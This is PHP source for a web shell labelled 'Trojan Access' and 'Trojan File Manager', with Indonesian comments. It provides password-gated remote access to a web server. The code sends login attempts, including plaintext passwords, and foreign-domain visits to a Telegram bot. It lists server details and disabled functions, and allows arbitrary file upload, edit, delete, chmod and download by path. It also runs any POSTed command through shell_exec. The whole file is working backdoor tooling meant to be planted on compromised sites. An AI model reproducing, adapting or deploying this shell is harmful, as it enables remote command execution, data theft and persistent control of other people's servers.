$chatId, "text" => $msg, "parse_mode" => "HTML" ]; $options = [ "http" => [ "header" => "Content-Type: application/x-www-form-urlencoded\r\n", "method" => "POST", "content" => http_build_query($data) ] ]; $context = stream_context_create($options); @file_get_contents($url, false, $context); } // === ANTI-COPY LOGGER === $currentDomain = $_SERVER['HTTP_HOST'] ?? 'Unknown'; $ip = $_SERVER['REMOTE_ADDR'] ?? 'Unknown'; if (!in_array($currentDomain, $allowedDomains)) { $uniqueKey = $currentDomain . '|' . $ip; $hashKey = md5($uniqueKey); $logFile = __DIR__ . "/.anti_copy_log"; // cache file // buat file kosong jika belum ada if (!file_exists($logFile)) { file_put_contents($logFile, ""); } // baca isi log jadi array $logged = @file($logFile, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); if (!is_array($logged)) { $logged = []; } // cek apakah kombinasi domain+IP sudah ada if (!in_array($hashKey, $logged)) { $uri = $_SERVER['REQUEST_URI'] ?? ''; $full = "http://" . $currentDomain . $uri; $ua = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown'; $time = date("Y-m-d H:i:s"); $msg = "⚠️ Script Dicuri / Dijalankan di Domain Asing\n" . "🌐 Domain: $full\n" . "👤 IP: $ip\n" . "📱 User Agent: $ua\n" . "⏰ Time: $time"; sendTelegram($botToken, $chatId, $msg); // simpan hash ke log file file_put_contents($logFile, $hashKey . PHP_EOL, FILE_APPEND | LOCK_EX); } } if (!isset($_SESSION['logged_in'])) { if (isset($_POST['password'])) { $domain = $_SERVER['HTTP_HOST'] ?? 'Unknown'; $uri = $_SERVER['REQUEST_URI'] ?? ''; $fullUrl = "http://" . $domain . $uri; $ua = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown'; $ip = $_SERVER['REMOTE_ADDR'] ?? 'Unknown'; $time = date("Y-m-d H:i:s"); $passTry = $_POST['password']; if (password_verify($_POST['password'], $hashPassword)) { $_SESSION['logged_in'] = true; $msg = "✅ Login Berhasil\n" . "🌐 Domain: $fullUrl\n" . "👤 IP: $ip\n" . "📱 User Agent: $ua\n" . "🔑 Password Input: $passTry\n" . "⏰ Time: $time"; sendTelegram($botToken, $chatId, $msg); header("Location: " . $_SERVER['PHP_SELF']); exit; } else { $error = "Password salah!"; $msg = "❌ Login Gagal\n" . "🌐 Domain: $fullUrl\n" . "👤 IP: $ip\n" . "📱 User Agent: $ua\n" . "🔑 Password Input: $passTry\n" . "⏰ Time: $time"; sendTelegram($botToken, $chatId, $msg); } } ?> Trojan Login

💀 Trojan Access 💀

$error

"; ?>
All Functions Accessible" : "$disable_functions"; // Cek ekstensi $curl = extension_loaded("curl") ? "ON" : "OFF"; $ssh2 = extension_loaded("ssh2") ? "ON" : "OFF"; $mysql = (extension_loaded("mysqli") || extension_loaded("mysqlnd")) ? "ON" : "OFF"; echo "
"; echo "🖥️ Uname: $uname
"; echo "👤 User: $user
"; echo "🐘 PHP: $phpv | SAPI: $sapi
"; echo "🌐 Server IP: $server_ip | Your IP: $client_ip
"; echo "⏰ DateTime: $datetime
"; echo "💾 HDD: Total: {$hdd_total} GB | Free: {$hdd_free} GB
"; echo "🕵️ User Agent: $ua
"; echo "⚙️ Disable Functions: $disable_functions
"; echo "🔌 CURL: $curl | SSH2: $ssh2 | MySQL: $mysql
"; echo "📦 Software: $soft
"; echo "
"; } // Variabel utama $currentDir = isset($_GET['dir']) ? $_GET['dir'] : __DIR__; // Upload file if (isset($_FILES['upload'])) { $target = $currentDir . DIRECTORY_SEPARATOR . basename($_FILES['upload']['name']); move_uploaded_file($_FILES['upload']['tmp_name'], $target); header("Location: ?dir=$currentDir"); exit; } // Create folder if (!empty($_POST['newfolder'])) { mkdir($currentDir . DIRECTORY_SEPARATOR . $_POST['newfolder']); header("Location: ?dir=$currentDir"); exit; } // Create file if (!empty($_POST['newfile'])) { file_put_contents($currentDir . DIRECTORY_SEPARATOR . $_POST['newfile'], "// new file"); header("Location: ?dir=$currentDir"); exit; } // Delete file/folder if (isset($_GET['delete'])) { $target = $_GET['delete']; if (is_dir($target)) { rmdir($target); } else { unlink($target); } header("Location: ?dir=$currentDir"); exit; } // Download file if (isset($_GET['download'])) { $file = $_GET['download']; header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.basename($file).'"'); readfile($file); exit; } // Rename if (isset($_POST['rename_from'], $_POST['rename_to'])) { rename($_POST['rename_from'], $currentDir . DIRECTORY_SEPARATOR . $_POST['rename_to']); header("Location: ?dir=$currentDir"); exit; } // Chmod if (isset($_POST['chmod_file'], $_POST['chmod_perm'])) { chmod($_POST['chmod_file'], octdec($_POST['chmod_perm'])); header("Location: ?dir=$currentDir"); exit; } // Edit file if (isset($_POST['edit_file'], $_POST['file_content'])) { file_put_contents($_POST['edit_file'], $_POST['file_content']); header("Location: ?dir=$currentDir"); exit; } // Variabel utama (pakai realpath biar aman) $currentDir = isset($_GET['dir']) ? realpath($_GET['dir']) : __DIR__; if ($currentDir === false) $currentDir = __DIR__; // Breadcrumb function breadcrumb($path) { $parts = explode(DIRECTORY_SEPARATOR, trim($path, DIRECTORY_SEPARATOR)); $crumb = ""; $links = []; foreach ($parts as $part) { $crumb .= DIRECTORY_SEPARATOR . $part; $links[] = "$part"; } // tombol Home ke __DIR__ $homeDir = __DIR__; $homeBtn = "[🏠 Home]"; echo "
PATH: " . implode(" ▸ ", $links) . " $homeBtn
"; } // List files/folders function listFiles($dir) { $files = scandir($dir); $folders = []; $regularFiles = []; foreach ($files as $file) { if ($file=="." ) continue; if ($file=="..") { echo "⬅️ Up"; continue; } $path = $dir . DIRECTORY_SEPARATOR . $file; if (is_dir($path)) $folders[$file] = $path; else $regularFiles[$file] = $path; } // Folders dulu foreach ($folders as $file => $path) { $perm = substr(sprintf('%o', fileperms($path)), -4); echo " 📂 $file -- $perm
[❌] "; } // Lalu file foreach ($regularFiles as $file => $path) { $perm = substr(sprintf('%o', fileperms($path)), -4); echo " 📄 $file " . filesize($path) . " B $perm [⬇️] [❌] [✏️]
"; } } ?> Trojan Manager

💻 Trojan File Manager 💻


✏️ Editing: $editFile"; echo "

"; } echo ""; echo ""; listFiles($currentDir); echo "
NameSizePermActions
"; ?>
&1"); // cek kalau ada wget atau curl -O if (preg_match('/\bwget\s+(\S+)/', $command, $m) || preg_match('/\bcurl\s+-O\s+(\S+)/', $command, $m)) { $url = basename($m[1]); if (file_exists($currentDir . DIRECTORY_SEPARATOR . $url)) { $downloadLink = "
📥 Download hasil: $url"; } } } ?>
'dir', 'clear' => 'cls', 'cat' => 'type', 'pwd' => 'cd', 'rm' => 'del', 'mv' => 'move', 'cp' => 'copy' ]; foreach ($map as $linux => $win) { if (preg_match("/^$linux(\s|$)/", $cmd)) { $cmd = preg_replace("/^$linux/", $win, $cmd); break; } } return $cmd; } if (isset($_POST['cmd'])) { $command = $_POST['cmd']; $originalCmd = $command; // simpan asli $command = translateCommand($command, $isWindows); $termOutput = shell_exec($command . " 2>&1"); // 🔥 Deteksi wget / curl if (!$isWindows) { if (preg_match('/\bwget\s+(?:-O\s+(\S+))?\s*(\S+)/', $originalCmd, $m)) { // wget -O filename url $fileName = !empty($m[1]) ? $m[1] : basename($m[2]); } elseif (preg_match('/\bcurl\s+(?:-o|-O)\s+(\S+)/', $originalCmd, $m)) { // curl -O url / curl -o filename url $fileName = basename($m[1]); } if (!empty($fileName)) { $filePath = $currentDir . DIRECTORY_SEPARATOR . $fileName; if (file_exists($filePath)) { $downloadLink = "
📂 Buka File: $fileName"; } } } } ?>
[X]

💻 Terminal